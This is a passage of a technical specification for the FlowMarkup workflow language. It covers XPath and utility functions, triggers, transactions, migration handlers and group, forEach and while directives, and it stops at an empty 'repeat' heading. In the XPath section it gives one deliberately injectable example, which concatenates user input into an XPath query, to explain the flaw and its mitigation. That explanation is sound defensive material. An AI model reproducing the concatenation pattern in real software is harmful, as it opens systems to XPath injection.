The XML-to-MAP mapping convention (§1.3) governs all XML decoding contexts: `decode(XML)`, `parse(XML)`, `parseAs: XML` (exec/ssh/request/storage), and RESOURCES `.xml` loading.

#### XPath Functions

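Three CEL functions for working with XPath over raw XML strings (not parsed MAPs; XPath is native to XML's DOM). `xpath()` and `xpathAll()` run queries; `xpathParam()` builds a safely escaped expression: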

| Function | Returns | Description |
|---|---|---|
| `string.xpath(expr)` | first match | STRING for text/attribute nodes, MAP for element nodes (same mapping convention), NUMBER/BOOLEAN for XPath results. `null` if no match. |
| `string.xpathAll(expr)` | ARRAY | All matches. Empty `[]` if none. |
| `xpathParam(expr, bindings)` | STRING | Safe parameterized XPath. For each `{key: value}` in `bindings`, replaces `$key` in `expr` with a safely escaped XPath string literal. Escaping strategy: no quotes → single quotes; contains `'` → double quotes; contains both → `concat()` segments. |

Expressions use XPath 1.0, which is widely supported across languages (e.g., `javax.xml.xpath` in Java, `lxml` in Python, `xmldom`/`xpath` in JavaScript, `System.Xml.XPath` in C#).

Errors: `XPathError` (invalid expression), `ParseError` (malformed XML).

**Two access paths for XML data:** Users choose between: (A) `decode(XML)` for structured MAP access via dot notation (fast, simple, but loses XPath), or (B) keep as TEXT/STRING and use `xpath()`/`xpathAll()` for XPath queries (powerful, but requires string variable).

**Usage example:**
```yaml
vars:
  xml_response:
    $kind: TEXT
    $value: =RESULT.body
do:
- set:
    order_id: "=xml_response.xpath('/order/@id')"
    item_names: "=xml_response.xpathAll('//item/text()')"
    first_item: "=xml_response.xpath('//item[1]')"
```

```yaml
# Safe XPath with user input — prevents XPath injection (CWE-643)
- set:
    user_node: "=xml_data.xpath(xpathParam('//user[@id=$id and @role=$role]', {'id': input.user_id, 'role': input.role}))"
    # xpathParam produces: //user[@id='alice' and @role='admin']
```

**XPath injection (CWE-643):** XPath expressions constructed from user input are vulnerable to injection. Example: `xpath: ="//user[@id='" + user_input + "']"` allows an attacker to break out of the string literal and access arbitrary nodes. **This is a critical security concern** — XPath 1.0 has no parameterized query API and no safe general-purpose escaping for string literals. Mitigation: validate `user_input` against a strict allowlist (e.g., `=user_input.matches('^[a-zA-Z0-9_-]+$')`) before incorporating into XPath expressions. SA-XML-3 (WARN) flags XPath expressions that incorporate user-controlled input. When processing user-influenced queries, flow authors MUST prefer `decode(XML)` with MAP access over `xpath()`. When XPath is required with user-controlled values, flow authors MUST use `xpathParam()` for safe escaping.

#### Number Formatting Functions

| Function | Returns | Description |
|---|---|---|
| `number.toFixed(n)` | string | Format number with exactly `n` decimal places (half-up rounding). Example: `(3.14159).toFixed(2)` -> `"3.14"` |
| `number.round(n)` | number | Round number to `n` decimal places (half-up rounding). Example: `(3.14159).round(2)` -> `3.14` |

`toFixed(n)` returns a string for display purposes (like JavaScript's `Number.prototype.toFixed`). `round(n)` returns a number for further computation. `n` must be a non-negative integer (>= 0); negative values are a runtime error. `round(0)` rounds to an integer but remains a NUMBER (not converted to INTEGER).

#### `version()` CEL Function

`version(str)` parses a version string into a `Version` value supporting comparison operators.

**Properties:**

| Property | Type | Description |
|---|---|---|
| `.major` | integer | Major version component |
| `.minor` | integer | Minor version component |
| `.patch` | integer | Patch version component |
| `.build` | string | Build metadata string (e.g., `"20260315"` from `1.2.3+20260315`) |
| `.revision` | string | VCS revision identifier (e.g., commit SHA) |
| `.pre_release` | string | Pre-release label (e.g., `"beta.1"` from `1.2.3-beta.1`) |
| `.build_metadata` | string | Full build metadata string (alias for `.build`) |
| `.snapshot` | boolean | `true` if version is a snapshot/pre-release (i.e., `.pre_release` is non-empty) |
| `.segments` | list(integer) | List of integer version components (e.g., `[1, 2, 3]` from `"1.2.3"`) |
| `.raw` | string | Original unparsed version string |

`isValidVersion(str)` returns `true` if `str` is parseable as a version. Passing an unparseable string to `version()` raises `VersionParseError`.

> **Warning:** `VersionParseError` is non-catchable (see FLOWMARKUP-ERRORS.md). When `version()` receives external input, always validate with `isValidVersion(str)` first. For defense-in-depth with mutable sources, validate immediately before calling `version()` in the same expression: `=isValidVersion(v) ? version(v) : fallback`.
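
The validate-then-parse pattern might look like this in a flow. `client_version` is a hypothetical input, and `2.1.0` is an arbitrary threshold chosen for the example.

```yaml
- set:
    # isValidVersion() is checked first, so version() is only reached
    # for parseable input and VersionParseError cannot be raised here.
    client_ok: "=isValidVersion(client_version) ? version(client_version) >= version('2.1.0') : false"
```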

#### Random and UUID Functions

| Function | Returns | Description |
|---|---|---|
| `uuid()` | string | Generate a UUID v4 string (e.g., `"550e8400-e29b-41d4-a716-446655440000"`). |
| `random()` | number | Generate a random decimal in `[0.0, 1.0)`. |
| `random(min, max)` | integer | Generate a random integer in `[min, max]` (both inclusive). Example: `random(1, 4)` returns `1`, `2`, `3`, or `4`. `min` and `max` MUST be integers; `min` MUST be less than or equal to `max`. |
| `now()` | `google.protobuf.Timestamp` | Returns the current UTC timestamp at the time of evaluation. **Non-deterministic** — SA-IDEMP-1 flags usage in idempotency keys. Not suitable for reproducible computations. |

The random-value functions (`uuid()`, `random()`, and `random(min, max)`) MUST use a CSPRNG (cryptographically secure pseudorandom number generator). **Idempotency impact:** Using `uuid()`, `random()`, `random(min, max)`, or `now()` in `idempotencyKey` defeats deduplication; SA-IDEMP-1 (ERROR) rejects non-deterministic functions in idempotency keys. These functions also affect replay determinism. Engines MUST record non-deterministic function results (`uuid()`, `random()`, `random(min, max)`, `now()`) in the execution trace/checkpoint. On replay, engines MUST reuse the recorded values rather than re-evaluating, preserving determinism for audit and debugging purposes.

#### 2.7.1 User-Defined Functions

```yaml
functions:
  normalize:
    params: [value]
    body: "=value.trim().lowerAscii().replace('-', '_')"

  clamp:
    params:
      val: { $kind: NUMBER }
      minVal: { $kind: NUMBER }
      maxVal: { $kind: NUMBER }
    body: "=val < minVal ? minVal : (val > maxVal ? maxVal : val)"
```

| Rule | Detail |
|---|---|
| `body:` prefix | `=` prefix REQUIRED (SA-QUOTE-1) |
| No recursion | SA-FN-2 (self), SA-FN-3 (cycle) |
| Scope | Flow-local only |
| Naming | `^[a-z][a-zA-Z0-9_]*$` |
| Purity | Read-only by CEL design |
| Chaining | May call other functions in same block |
| Shadowing | User definition wins over built-in (SA-FN-1 warn) |
| Arity check | SA-FN-6 |

**String output size limit.** CEL expression evaluation MUST enforce a maximum string size (default: 1 MB, configurable up to 10 MB). The limit applies to intermediate string values during evaluation, not just the final result, and covers string concatenation, `join()`, format functions, and template expansion. When an expression produces a string exceeding the limit (e.g., through repeated concatenation, `string.repeat()`, or `join()` on large collections), the engine MUST abort evaluation and raise `ResourceLimitError` rather than consume unbounded memory. *(CWE-400: Uncontrolled Resource Consumption)*

**CEL intermediate value memory limit.** The engine MUST enforce a configurable per-expression memory limit for intermediate CEL values including MAP, ARRAY, and nested structures (default: 10 MB, configurable maximum: 100 MB). `list.reduce()`, `list.map()`, `list.filter()`, and other collection macros MUST count toward this limit. Exceeding raises `ResourceExhaustedError`. *(CWE-400)*

### 2.8 Triggers

```yaml
triggers:
  - event: order_submitted
    condition: "=EVENT.DATA.priority == 'rush'"
  - cron: "0 9 * * MON-FRI"
  - schedule: "every 5m"
```

| Type | Description |
|---|---|
| `event:` | Static event type. Optional `condition:` filter with `EVENT.DATA.*`. |
| `cron:` | 5-field cron expression. |
| `schedule:` | Human-readable interval or time. |

**Trigger overlap behavior.** When a trigger fires while a previous invocation is still running, the behavior depends on the `concurrency:` property:

| `concurrency:` | Behavior |
|---|---|
| `ALLOW` (default) | New instance starts immediately. Concurrent instances are limited only by the engine's per-trigger maximum (see below). |
| `SKIP` | Trigger is silently dropped if an instance is already running. |
| `QUEUE` | Trigger is queued; starts when the running instance completes. Maximum queue depth: `maxQueued` (default: 10). |
| `REPLACE` | Running instance is cancelled; new instance starts. Cancelled instance receives `CancellationError`. |

The engine MUST enforce a configurable maximum concurrent instances per trigger (default: 100). Exceeding the limit MUST raise `ResourceExhaustedError`. *(CWE-400)*
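
A sketch of overlap policies in use. It assumes that `concurrency:` and `maxQueued:` are set on the individual trigger entry, which this section does not state explicitly; the values shown are illustrative.

```yaml
triggers:
  - cron: "0 9 * * MON-FRI"
    concurrency: SKIP        # assumed placement: drop the run if one is active
  - event: order_submitted
    concurrency: QUEUE       # wait for the running instance to complete
    maxQueued: 25            # overrides the default queue depth of 10
```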

Event data maps to `input:` by name. `EVENT` is a reserved variable name.

### 2.9 Event Contracts (`events:`)

Each entry is an `eventDeclaration` with `_notes_:` and `data:` (paramContract). Event names follow `snake_case`. All SA-EVENT rules are gated on `events:` being present. Cross-flow verification is out of scope.

**Event capability gating:** Flows that emit or listen for GLOBAL-scope events MUST declare the event types in `events:` (SA-EVENT-9, ERROR). This prevents unauthorized flows from injecting events into the global event bus or eavesdropping on events intended for other flows. LOCAL-scope events do not require declaration. CONTEXT-scope events SHOULD be declared in `events:` (SA-EVENT-10, WARN) — undeclared CONTEXT-scope `emit`/`waitFor` may allow sub-flows with CONTEXT access to eavesdrop on parent coordination events.

Flows with security-sensitive capabilities (`SECRET`, `EXEC`, `SSH`, `STORAGE`) MUST declare all CONTEXT-scope event types they emit or wait for. Undeclared CONTEXT events in security-sensitive flows are rejected by SA-EVENT-10 (ERROR) to prevent event eavesdropping attacks.

---

### 2.10 Rollback and Transaction Groups

#### Root-Level Transaction (Implicit Group)

When `transaction:`, `onRollbackError:`, or `locking:` are set at the `flowmarkup:` root, the engine wraps the entire `do:` list in an implicit sequential `group:` with those properties. This avoids the boilerplate of an outer `group:` when the whole flow is one transaction:

```yaml
# Equivalent — root-level shorthand
flowmarkup:
  transaction: true
  onRollbackError: CONTINUE
  do:
  - call: { service: payment, operation: charge, ... }
  - call: { service: ledger, operation: record, ... }

# Equivalent — explicit group
flowmarkup:
  do:
  - group:
      transaction: true
      onRollbackError: CONTINUE
      do:
      - call: { service: payment, operation: charge, ... }
      - call: { service: ledger, operation: record, ... }
```

`catch:` and `finally:` at the flow root execute outside the implicit group (after rollback handlers, as usual).

#### `transaction: true` on `group`

| Property | Type | Description |
|---|---|---|
| `transaction` | boolean or string | `true` = fork all scopes; `"GLOBAL"`/`"CONTEXT"`/`"LOCAL"` = fork named scope only |
| `onRollbackError` | string | `CONTINUE` (default) or `FAIL` |
| `locking` | string | `PESSIMISTIC` (default) or `OPTIMISTIC` |

**Mechanism:**
- On entry: fork variable scopes (isolated working copy)
- All writes go to the fork
- Success: fork committed atomically
- Error: fork discarded (after rollback handlers complete)
- `emit` inside transaction groups is buffered until commit
- `log` is NOT buffered
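
The mechanism above can be traced through a small group. The `emit:` shape shown here (an object with an `event:` key) is an assumption, and `GLOBAL.stock` and `stock_reserved` are hypothetical names.

```yaml
- group:
    transaction: true
    locking: OPTIMISTIC
    do:
    - set:
        GLOBAL.stock: =GLOBAL.stock - 1      # written to the fork only
    - emit: { event: stock_reserved }        # buffered until commit
    - log: "Reserved one unit"               # not buffered
```

If a later step in the group fails, the decrement and the buffered event are discarded with the fork, while the log line has already been written.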

#### Isolation Guarantees

##### Per-Step Atomicity (Read Committed) -- Always Applies

1. **Snapshot read:** All CEL expressions within a single step evaluate against the same point-in-time snapshot.
2. **Atomic write:** All variable writes from a single step become visible atomically.
3. **Read-modify-write safety (`set`):** When a `set` step reads and writes shared variables, the engine MUST ensure serialized execution (transparent OCC retry). Per-step OCC does NOT apply inside `transaction: true` groups — the transaction group provides its own serializable isolation (see "Transaction Group Isolation" below), which subsumes the per-step guarantee.

##### Transaction Group Isolation (Serializable -- MUST)

1. **Stable reads** within the group
2. **Buffered writes** invisible to others until commit
3. **Serializable guarantee (MUST):** Result of concurrent transaction groups MUST be equivalent to some serial order. If not achievable, engine MUST raise `ConflictError`.
4. **Atomic commit/rollback**

**`locking: PESSIMISTIC`** (default): Per-variable locks acquired at entry. `ConflictError` never occurs.

**`locking: OPTIMISTIC`**: Snapshot-based. `ConflictError` possible at commit if concurrent modification detected.

| Anomaly | Per-step only | Transaction group |
|---|---|---|
| Dirty read | Prevented | Prevented |
| Non-repeatable read | Possible between steps | **Prevented** |
| Lost update | Prevented (single `set`); possible across steps | **Prevented** |
| Write skew | N/A | **Prevented** |

##### Error Types

- **`ConflictError`** -- at commit time (`OPTIMISTIC`) or OCC retry exhaustion. Properties: `ERROR.DATA.variables`, `ERROR.DATA.source`.
- **`DeadlockError`** -- cycle in lock wait-for graph. Properties: `ERROR.DATA.locks`.

##### Interaction with `lock`

| Construct | Isolation | ConflictError? |
|---|---|---|
| No lock, no transaction | Per-step Read Committed only | No |
| `lock EXCLUSIVE` | Serializable (single holder), no rollback | No |
| `transaction: true` | Serializable + rollback | Only with OPTIMISTIC |
| Both | Serializable + rollback. SA-ROLLBACK-3 warns (redundant for GLOBAL/CONTEXT) | No |

##### Nested Transactions

Inner `transaction: true` creates a nested buffer. Inner commit merges into outer buffer. Inner rollback discards inner buffer. Inner group inherits outer's locking mode (SA-ISO-7 warns if inner declares different mode). The engine MUST enforce a configurable maximum nesting depth (default: 10, maximum: 100). Exceeding raises `ResourceExhaustedError`. When a transaction group completes (commit or rollback), its forked scope MUST be immediately released. The engine MUST account fork memory against the per-instance memory limit — each active fork's modified variables count toward the total.

##### Scope-Specific Fork

`transaction: "GLOBAL"` forks only that scope. Non-forked scope writes are immediate and NOT rolled back (SA-ISO-8 warns). When `mode: PARALLEL` and `transaction: true`, each parallel branch operates on its own fork of all scopes (including `GLOBAL.*`). Branches CANNOT see each other's uncommitted writes — each branch sees the snapshot taken at fork time. Writes are merged at commit in branch declaration order; conflicting writes from later branches overwrite earlier ones (last-writer-wins within the committed set).

##### `return` Inside Transaction Group

Commits the fork. With `OPTIMISTIC` locking, the commit can raise `ConflictError`; in that case rollback handlers fire, the fork is discarded, and `RolledBackError` propagates (SA-CONC-5 warns).

#### `rollback:` on Action Steps

- Placement: action steps only
- When action completes successfully, rollback handler pushed onto per-scope stack
- On unhandled error past scope boundary: handlers fire in reverse completion order
- Handlers execute with fork still live (before discard)
- `rollback:` body is a `stepList`

#### Error Types

| Error | Condition |
|---|---|
| `RolledBackError` | All rollback handlers succeeded |
| `RollbackFailedError` | One or more handlers failed; `ERROR.DATA.succeeded` (list of `_id_`s) and `ERROR.DATA.failed` (list of `_id_`s) |

#### Ordering: rollback, catch, finally

(1) Rollback handlers in reverse order -> (2) fork discarded -> (3) error wrapped as `RolledBackError`/`RollbackFailedError` -> (4) `catch:` -> (5) `finally:`.
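The ordering above can be sketched in Python as follows. This is a hedged illustration only: the `unwind` function and the exception classes are stand-ins, it assumes a failing handler does not stop the remaining handlers from running (which the `succeeded`/`failed` lists suggest), and chaining the original error as the cause is an assumption of the sketch.

```python
class RolledBackError(Exception):
    """All rollback handlers succeeded."""


class RollbackFailedError(Exception):
    """One or more rollback handlers failed."""

    def __init__(self, succeeded, failed):
        super().__init__("one or more rollback handlers failed")
        self.data = {"succeeded": succeeded, "failed": failed}


def unwind(rollback_stack, original_error):
    """rollback_stack: list of (step_id, handler) in completion order."""
    succeeded, failed = [], []
    # (1) Fire handlers in reverse completion order.
    for step_id, handler in reversed(rollback_stack):
        try:
            handler()
            succeeded.append(step_id)
        except Exception:
            failed.append(step_id)
    # (2) The fork would be discarded here (not modelled in this sketch).
    # (3) Wrap the error; the caller then runs catch: and finally:.
    if failed:
        wrapped = RollbackFailedError(succeeded, failed)
    else:
        wrapped = RolledBackError("rolled back")
    wrapped.__cause__ = original_error  # assumption: original kept as cause
    return wrapped


calls = []

def failing_refund():
    raise RuntimeError("refund failed")

stack = [
    ("reserve", lambda: calls.append("reserve")),
    ("charge", failing_refund),
    ("ship", lambda: calls.append("ship")),
]
error = unwind(stack, ValueError("boom"))
```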

Static analysis: SA-ROLLBACK rules apply.

---

### 2.11 `onVersionChange` -- Migration Handler

Flow-level lifecycle hook (not a directive). Runs during checkpoint resume when flow content has changed.

```yaml
onVersionChange:
  - log: "='Migrating from v' + string(MIGRATION.OLD_VERSION)"
  # Path 1: return — gracefully terminate incompatible instances
  - if:
      condition: =MIGRATION.OLD_VERSION < 2
      then:
        - log: "='v' + string(MIGRATION.OLD_VERSION) + ' too old — terminating instance'"
        - return: {status: terminated, reason: incompatible_version}
  # Path 2: throw — error, preserve checkpoint for retry
  - if:
      condition: =MIGRATION.OLD_VERSION == 2 && !has(user_email)
      then:
        - throw: { error: MigrationError, message: "v2 checkpoint missing required user_email" }
  # Path 3: complete normally — resume with new version (v2→v3 migration)
  - if:
      condition: =has(user_email)
      then:
        set: { customer_email: =user_email }
```

**`MIGRATION` CEL binding** (available inside `onVersionChange:` only):

| Binding | Type | Description |
|---|---|---|
| `MIGRATION.OLD_VERSION` | integer | `version:` from checkpoint (defaults to `1` when not specified) |
| `MIGRATION.NEW_VERSION` | integer | `version:` from new flow (defaults to `1` when not specified) |
| `MIGRATION.OLD_HASH` | string | Content hash of old flow |
| `MIGRATION.NEW_HASH` | string | Content hash of new flow |
| `MIGRATION.LOCATION` | string | Canonical flow location |
| `MIGRATION.STEP_CURSOR` | string | Checkpoint step cursor |
| `MIGRATION.CHECKPOINTED_AT` | timestamp | When checkpoint was taken |

**Version default:** When `version:` is omitted, it defaults to `1`. `MIGRATION.OLD_VERSION` and `MIGRATION.NEW_VERSION` are therefore always integers, never null.

**Forbidden:** `wait`/`waitFor`/`waitUntil` (SA-VER-3), `async: true` (SA-VER-4), `yield` (SA-VER-5).

**Error types:** `MigrationError` (non-catchable), `FlowVersionError` (when `onVersionChange:` absent).

**Handler outcomes:**

1. **Completes normally** — resume flow instance with new version. Checkpoint variables reflect handler modifications.
2. **Executes `return`** — gracefully terminate the flow instance. `finally:` still runs. Checkpoint is discarded (instance is done). Return value (if any) becomes the flow's output and MUST conform to the `output:` contract.
3. **Throws** — wrapped as `MigrationError` (non-catchable). Checkpoint preserved for retry.

Handlers SHOULD be idempotent: because the checkpoint is preserved on error, a handler may run again on retry.

**Audit requirements:** The engine MUST audit-log all variable modifications performed by `onVersionChange:` handlers, including before/after value hashes. The engine MUST log the old FlowRef, new FlowRef, and deployer identity. See [FLOWMARKUP-ENGINE.md](FLOWMARKUP-ENGINE.md) §5.7 audit events.

> **Migration handler restrictions.** Migration handlers MUST NOT write to `GLOBAL.*` or `CONTEXT.*` scopes. Migration handlers MUST NOT modify variables annotated with `$secret: true`. Static analysis rule SA-VER-6 (ERROR) MUST reject writes to shared scopes or secret-tagged variables in `onVersionChange:` handlers. *(CWE-269)*

> **Migration handler action restrictions.** Migration handlers MUST NOT execute `exec`, `ssh`, `request`, `mail`, `storage`, `call`, or `run` action steps. Migration handlers run during a sensitive lifecycle phase (checkpoint resume) where the flow's capabilities may differ between versions. Only `set:`, `log:`, `assert:`, `emit:`, control flow directives (`if`, `switch`, `forEach`), and `return`/`throw` are permitted. SA-VER-7 (ERROR) MUST reject any other step inside `onVersionChange:` handlers. *(CWE-269)*

---

### 2.12 Deployment Security

The engine MUST authenticate flow deployment operations. Anonymous flow deployment MUST be denied by default. The engine MUST support capability provisioning policies that restrict which capabilities (`EXEC`, `SSH`, `SECRET`, `MAIL`, `STORAGE`, `REQUEST`) may be granted to flows deployed by a given identity. The engine MUST log all deployment operations to the audit log including: deployer identity, flow identifier, requested capabilities, deployment timestamp, and whether the deployment was accepted or rejected.

> **Capability provisioning.** The engine MUST maintain a configurable per-identity (or per-role) capability allowlist. A flow requesting capabilities not in the deployer's allowlist MUST be rejected at deployment time with `AccessDeniedError`. This prevents any single flow author from granting themselves arbitrary system access. Detailed deployment authorization models (RBAC, ABAC) are defined in [FLOWMARKUP-ENGINE.md](FLOWMARKUP-ENGINE.md) §5.8. *(CWE-269)*

---

## 3. Directives (Core + Shorthands: `parallel`, `race`, `logWarn`, `logError`)

**Step annotations:** `_label_`, `_notes_`, `_meta_`, `_id_` are available on all directives and actions.

**Single-step body unwrapping:** Wherever a step list is expected, a single step object MAY be provided directly without wrapping in a list.

**`condition:` pre-execution guard:** All directives and actions support an optional `condition:` pre-execution guard (CEL expression). When present and the expression evaluates to false, the step is skipped entirely (including `finally:` on `try:` — the step is not entered at all). Exceptions: `set:` (body keys are variable names; wrap in `if:` instead). For `if`/`while`/`assert`, `condition:` IS the directive's own condition. For `waitFor`, `condition:` is a post-receive filter.

### 3.1 `group`

Unified step group with three modes:

| Mode | Behavior |
|---|---|
| `SEQUENCE` (default) | Steps/branches run in order |
| `PARALLEL` | All branches run concurrently; all MUST complete |
| `RACE` | First branch to complete wins; others cancelled |

Cancellation in RACE mode is non-transactional: side effects from cancelled branches (API calls, database writes, emitted events) are NOT automatically rolled back. If compensation is needed, use `rollback:` handlers on action steps within the branches.

**Cancellation semantics.** RACE cancellation is cooperative: the engine checks for cancellation between steps. A step that is currently executing (e.g., waiting for an HTTP response) runs to completion before cancellation takes effect. `finally:` blocks in cancelled branches MUST execute. The engine MUST complete cancellation within a configurable grace period (default: 30 seconds). If a cancelled branch does not complete within the grace period, the engine MUST forcibly terminate it and log an ERROR-level audit event.

Static analysis rule SA-RACE-1 (WARN) MUST flag RACE branches containing side-effectful actions (`call`, `request`, `exec`, `ssh`, `mail`, `storage`, `emit`) without corresponding `rollback:` handlers.

**`failPolicy:`** (`PARALLEL`/`RACE` only):
- `FAST` (default): first error cancels all, error propagates
- `COMPLETE`: all branches run to completion; `GroupError` raised if any failed

**`branches:`** -- named branches with optional `condition:` (inclusive gateway) and `dependsOn:` (DAG dependencies). `do:` and `branches:` are mutually exclusive. `dependsOn:` is an array of branch name strings — the branch waits until all named dependencies complete before starting. Cycles in the dependency graph raise `ConfigurationError` at load time.
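A load-time check for `dependsOn:` cycles could look like the Python sketch below, which uses Kahn's topological sort. The function name `start_order` and the input shape are hypothetical, and rejecting a dependency on an undeclared branch with `ConfigurationError` is an assumption of this sketch rather than something stated above.

```python
from collections import deque


class ConfigurationError(Exception):
    pass


def start_order(depends_on):
    """depends_on: {branch: [branches it waits for]}. Returns a valid start order."""
    for branch, deps in depends_on.items():
        for dep in deps:
            if dep not in depends_on:  # assumption: unknown names are rejected
                raise ConfigurationError(f"{branch!r} depends on unknown branch {dep!r}")

    remaining = {b: len(deps) for b, deps in depends_on.items()}
    dependents = {b: [] for b in depends_on}
    for branch, deps in depends_on.items():
        for dep in deps:
            dependents[dep].append(branch)

    ready = deque(b for b, n in remaining.items() if n == 0)
    order = []
    while ready:
        branch = ready.popleft()
        order.append(branch)
        for waiting in dependents[branch]:
            remaining[waiting] -= 1
            if remaining[waiting] == 0:
                ready.append(waiting)

    # Any branch never released is part of (or blocked behind) a cycle.
    if len(order) != len(depends_on):
        raise ConfigurationError("cycle in dependsOn graph")
    return order


order = start_order({"fetch": [], "score": ["fetch"], "notify": ["fetch", "score"]})
```

In a real engine, branches whose dependencies are all complete would start concurrently; the linear order here only demonstrates that the graph is acyclic.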

**`onTimeout:`** -- non-interrupting handler. Fires when `after:` elapses without cancelling execution. Handler runs as a concurrent branch — the group does not complete until both the primary execution and the handler have finished. SA-CONC-1 warns on variable conflicts between handler and primary execution.

> **Design rationale:** `onTimeout:` is deliberately non-interrupting: it is designed for notifications, escalation, and audit logging while the primary operation continues. Handlers SHOULD only perform operations that cannot interfere with the primary execution (`log`, `emit`, `set` on independent variables). For interrupting timeout behavior that cancels the timed-out operation, use the step-level `timeout:` property instead.

**`defaults:`** -- scoped to the group, shadows outer defaults.

**`condition:`** -- optional pre-execution guard. When false, the entire group (including `finally:`) is skipped.

> **WARNING:** This also applies to `try:` blocks with `condition:`. When `condition:` is `false`, the entire `try` block is skipped, **including `finally:`**. This differs from programming languages where `finally` always runs after entering a try block. In FlowMarkup, `condition: false` means the step is never entered. If cleanup must run unconditionally, place it outside the `try` block or wrap the `condition:`-guarded `try` in an outer `try/finally`. SA-TRY-1 (WARN) flags `try` with `condition:` and `finally:` containing resource-cleanup steps.

**`transaction:`** and **`rollback:`** -- see [Rollback and Transaction Groups](#rollback-and-transaction-groups).

#### `parallel:` and `race:` Shorthands

`parallel:` and `race:` are syntactic sugar for `group:` with `mode: PARALLEL` or `mode: RACE`. Config keys (`timeout`, `failPolicy`, `defaults`, `transaction`, `onRollbackError`, `locking`, `onTimeout`, `condition`, `_id_`, `_label_`, `_notes_`, `_meta_`) are parsed as group options. All other keys are branch names.

> **Reserved branch names:** Branch names MUST NOT collide with config key names. SA-PARALLEL-2 (ERROR) rejects branches named `timeout`, `failPolicy`, `defaults`, `transaction`, `onRollbackError`, `locking`, `onTimeout`, `condition`, `_id_`, `_label_`, `_notes_`, or `_meta_`. To use a branch with such a name, use the full `group:` form with explicit `branches:`.

> **Reserved name stability.** The reserved branch name list (`timeout`, `failPolicy`, `defaults`, `transaction`, `onRollbackError`, `locking`, `onTimeout`, `condition`, `_id_`, `_label_`, `_notes_`, `_meta_`) is a closed set. This list MUST NOT be extended in minor or patch versions of the specification. Any new configuration keys introduced in future versions MUST be accepted only in the full `group:` form with explicit `branches:`; they MUST NOT be added to the shorthand reserved list.

```yaml
# parallel: shorthand
- parallel:
    failPolicy: COMPLETE
    fedex:
    - call: { service: shipping, operation: quote, params: { carrier: fedex } }
    ups:
    - call: { service: shipping, operation: quote, params: { carrier: ups } }

# race: shorthand
- race:
    openai:
    - call: { service: openai, operation: complete, result: response }
    anthropic:
    - call: { service: anthropic, operation: complete, result: response }
```

**Desugaring:** `parallel: { X }` desugars to `group: { mode: PARALLEL, branches: { X minus config keys } }`. `race: { X }` desugars to `group: { mode: RACE, branches: { X minus config keys } }`.
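As a rough illustration of the desugaring rule, the Python sketch below splits a shorthand body into group options and branches. The function name `desugar` is hypothetical, a step is assumed to be a single-key mapping, and branch bodies are passed through unchanged because the exact shape of a `branches:` entry is not restated here.

```python
CONFIG_KEYS = frozenset({
    "timeout", "failPolicy", "defaults", "transaction", "onRollbackError",
    "locking", "onTimeout", "condition", "_id_", "_label_", "_notes_", "_meta_",
})
MODES = {"parallel": "PARALLEL", "race": "RACE"}


def desugar(step):
    """Rewrite {"parallel": {...}} or {"race": {...}} into the full group form."""
    (shorthand, body), = step.items()
    options = {k: v for k, v in body.items() if k in CONFIG_KEYS}
    branches = {k: v for k, v in body.items() if k not in CONFIG_KEYS}
    if not branches:
        # Mirrors SA-PARALLEL-1: every key was a config key.
        raise ValueError("SA-PARALLEL-1: no branch names present")
    return {"group": {"mode": MODES[shorthand], **options, "branches": branches}}


group = desugar({
    "parallel": {
        "failPolicy": "COMPLETE",
        "fedex": [{"call": {"service": "shipping", "operation": "quote"}}],
        "ups": [{"call": {"service": "shipping", "operation": "quote"}}],
    }
})
```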

**When to use full `group:` form:** dynamic mode (`mode: =expr`), SEQUENCE mode, or when explicit structure is preferred.

SA-PARALLEL-1 (ERROR): no branch names present (all keys are config keys).

### 3.2 `if`

```yaml
- if:
    condition: =score > 0.8
    then:
      - <step>
    elseIf:
      - condition: =score > 0.5
        then:
          - <step>
    else:
      - <step>
```

`elseIf:` is an array of `{ condition, then }` clauses evaluated top-to-bottom. First match wins.

### 3.3 `forEach`

```yaml
- forEach:
    items: =results              # CEL expression
    as: item                     # loop variable (snake_case); defaults to item if omitted
    index: i                     # optional 0-based index
    concurrent: true             # optional
    maxConcurrency: 10           # optional cap
    completionCondition: =success_count >= 3  # optional, concurrent only
    do:
      - <step>
```

- **`condition:`** -- optional pre-execution guard. When false, the loop is skipped entirely.
- Empty items: loop body does not execute. `null` items: `ValidationError`.
- **Default `as:`:** When `as:` is omitted, the loop variable defaults to `item` — consistent with `snake_case` convention for data element names (§1.6). Explicit `as:` still works and is recommended when the domain name improves readability.
- `as:` creates per-iteration isolated binding that shadows existing variables.
- In concurrent mode, `as:`/`index:` are per-iteration copies; other variables are shared (last-writer-wins). `completionCondition` is evaluated after each iteration completes (evaluation is serialized). When true, remaining in-flight iterations are cancelled and the loop exits. For safe accumulation in concurrent forEach, use `set:` with GLOBAL scope and `lock:`, or use `completionCondition` to collect results via the built-in `RESULTS` array.

**Memory model for concurrent `forEach`:** (1) Scalar variable writes are atomic (the entire value is replaced in one operation). (2) MAP and ARRAY writes replace the entire value atomically (no partial updates visible to other iterations). (3) "Last writer wins" is determined by wall-clock completion order; in the event of a tie, the iteration with the higher index wins. (4) SA-FOREACH-7 (WARN) flags concurrent `forEach` iterations that write to the same non-lock-protected variable.
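Rule (3) amounts to ordering writes by completion time and then by iteration index. A minimal Python sketch, assuming each write is recorded as a hypothetical `(completed_at, iteration_index, value)` tuple:

```python
def winning_write(writes):
    """Pick the surviving value for one variable.

    writes -- list of (completed_at, iteration_index, value) tuples.
    The latest completion wins; on a tie, the higher index wins.
    """
    _completed_at, _index, value = max(writes, key=lambda w: (w[0], w[1]))
    return value


winner = winning_write([
    (10.0, 0, "a"),
    (12.5, 1, "b"),
    (12.5, 3, "c"),  # ties with index 1 on time, wins on index
    (11.0, 2, "d"),
])
```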

- `onTimeout:` available (same semantics as `group`).

**Maximum iteration limit.** `forEach` MUST support a `maxItems` property (integer, minimum: 1, maximum: 1,000,000; default: 10,000) that limits the number of iterations. If the `items` expression evaluates to a collection larger than `maxItems`, the engine MUST raise a `ResourceLimitError` and MUST NOT begin iteration; when `maxItems` is not specified, the default limit applies. This prevents resource exhaustion from unbounded iteration over large or attacker-controlled collections. Static analysis rule SA-FOREACH-3 MUST flag `forEach` steps where `maxItems` is not explicitly set and `items` references user-controlled input. *(CWE-770: Allocation of Resources Without Limits or Throttling)*

### 3.4 `while`

```yaml
- while:
    condition: =counter < max_retries
    do:
      - <step>
```

**Maximum iteration limit.** `while` and `repeat` loops MUST support a `maxIterations` property (default: 100,000) that limits the number of iterations. If the iteration count exceeds `maxIterations`, the engine MUST raise `ResourceLimitError`. Static analysis rule SA-LOOP-3 (WARN) MUST flag `while`/`repeat` loops where `maxIterations` is not explicitly set and the condition references user-controlled input. *(CWE-770: Allocation of Resources Without Limits or Throttling)*

### 3.5 `repeat`

